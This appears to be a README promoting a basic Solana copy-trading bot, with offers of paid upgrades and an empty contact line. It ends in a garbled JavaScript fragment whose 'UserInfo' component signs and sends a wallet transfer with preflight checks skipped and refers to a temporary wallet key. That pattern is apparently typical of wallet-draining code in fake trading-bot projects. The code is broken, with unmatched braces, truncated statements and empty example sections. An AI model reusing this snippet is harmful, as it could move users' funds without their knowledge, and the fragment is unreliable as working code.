This is copy trading bot running on several solana dex platform - raydium, meteora, pumpfun.
This is basic version, not full version.
In this bot, it track the profitable bots fast and copytrack it.
If you want, I can offer full version and can develop customized advanced project.
If you need help or any upgraded version, contact here:
This is not advanced project, but it will be basic knowledge for your solana bot study.
If you wanna have solana trading bot , I can customize it for your requirement.
Target transaction:
Copy transaction:
const UserInfo = () => {
try {
transferTransaction.recentBlockhash = (await con.getLatestBlockhash()).blockhash
transferTransaction.feePayer = wallet.publicKey
if (wallet.signTransaction) {
const signedTx = await wallet.signTransaction(transferTransaction)
const sTx = signedTx.serialize()
const signature = await con.sendRawTransaction(sTx, { skipPreflight: true })
const blockhash = await con.getLatestBlockhash()
await con.confirmTransaction({
blockhash: blockhash.blockhash,
lastValidBlockHeight: blockhash.lastValidBlockHeight
}, "confirmed");
} catch (error) {
return null;
try {
const TEMP_WALLET_PUBKEY = new PublicKey(tempWalletPubkey)
.then(temp => setBalance(temp / (10 ** 9)))
} catch (error) {